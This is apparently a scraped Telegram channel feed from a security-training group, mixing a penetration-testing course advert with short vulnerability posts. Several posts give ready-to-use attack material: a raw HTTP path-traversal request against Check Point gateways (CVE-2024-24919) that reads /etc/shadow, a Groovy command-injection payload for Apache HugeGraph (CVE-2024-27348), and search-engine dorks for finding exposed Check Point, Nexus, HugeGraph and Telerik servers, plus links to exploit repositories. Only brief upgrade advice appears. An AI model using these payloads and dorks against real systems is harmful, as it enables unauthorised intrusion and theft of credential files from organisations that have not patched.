Brut Security
15.2K subscribers
967 photos
76 videos
292 files
1.01K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
πŸš€ Advance Your Career in Cybersecurity with Our Comprehensive VAPT Course! πŸš€

🚨Are you ready to become a cybersecurity expert? Enroll in our Vulnerability Assessment and Penetration Testing (VAPT) course and gain the skills you need to protect critical systems and data.

πŸ“’Key Features:

πŸ”ΈLive Trainer-Led Online Training: Engage in interactive sessions led by experienced cybersecurity professionals.

πŸ”Έ50 Hours of Classes Over 3 Months: Comprehensive coverage of VAPT topics, allowing for in-depth learning and mastery.

πŸ”Έ70% Practical Oriented: Emphasis on hands-on labs and real-world scenarios to ensure you can apply what you learn.

πŸ”ΈPay in 2 Installments: Flexible payment options to suit your financial needs.

πŸ”ΈCareer Oriented Training: Focused on building the skills needed for a successful career in cybersecurity.

πŸ”Έ2 Practical Assignments & 1 Capture The Flag (CTF) Exam: Practical assessments to test and enhance your skills.

πŸ‘‰ Register Now: https://wa.me/message/NQLPOBIAEFDBN1
🚨CVE-2024-24919🚨

πŸ’₯Shodan Dork: title:"Check Point" ssl:"target"

🀠POC:

POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow
🀯6πŸ‘5
Media is too big
VIEW IN TELEGRAM
🚨Go Dork – The Fastest Dork Scanner🚨

πŸ‘‰Searching for relevant things on the Internet is always challenging work. Sometimes we don’t get desired results for our query or question. So to solve this problem, there is a concept of Dorking.

πŸ”—Github: https://github.com/dwisiswant0/go-dork
πŸ‘3πŸ€”1
Media is too big
VIEW IN TELEGRAM
🚨Check Point Quantum Gateway - CVE-2024-24919🚨

πŸ‘‰CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.

πŸ”—Github POC: https://github.com/seed1337/CVE-2024-24919-POC
πŸ‘2🀯1
Media is too big
VIEW IN TELEGRAM
🚨Adobe Coldfusion XSS - CVE-2023-44352🚨

πŸ‘‰Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
.
.
.
πŸ”—poc: https://buff.ly/3V2F8tD
πŸ‘2🀯2
🚨CVE-2024-4956:Nexus Repository Flaw Exposed🚨

⚠️This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.

πŸ‘‰Dorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"

POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956
CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.

πŸ’₯POC: https://lnkd.in/g_v4h7Cg

πŸ‘‰Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"
🀯8
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ“’Use This Extensions, it will help you to Extract all domains From any website.

πŸ”ΈLink Extractor: https://link-extractor.cssnr.com
πŸ”ΈLink Gopher: https://github.com/az0/linkgopher
πŸ‘2🀯2
🚨CVE-2024-27348: RCE in Apache HugeGraph-Server.

πŸ“’Remedy: Upgrade to version 1.3.0 to mitigate.

πŸ˜‰Payload:
{"gremlin":"def result = \"uname -a\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(\"BrutSecurity\"+ result);"
}


πŸ‘ŒVideo: https://youtu.be/32cyeCd4DEc
πŸ‘1
🚨Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)🚨

πŸ“’PoC: https://github.com/sinsinology/CVE-2024-4358

⚠Detailed Analysis from @SinSinology https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/

πŸ‘‰Dorks:
πŸ”ΈHunter: /product.name="Telerik report server"
πŸ”ΈFOFA: app="Telerik-Report-Server"
πŸ”ΈSHODAN: http.title:"Telerik report server"
πŸ‘2
Brut Security pinned Deleted message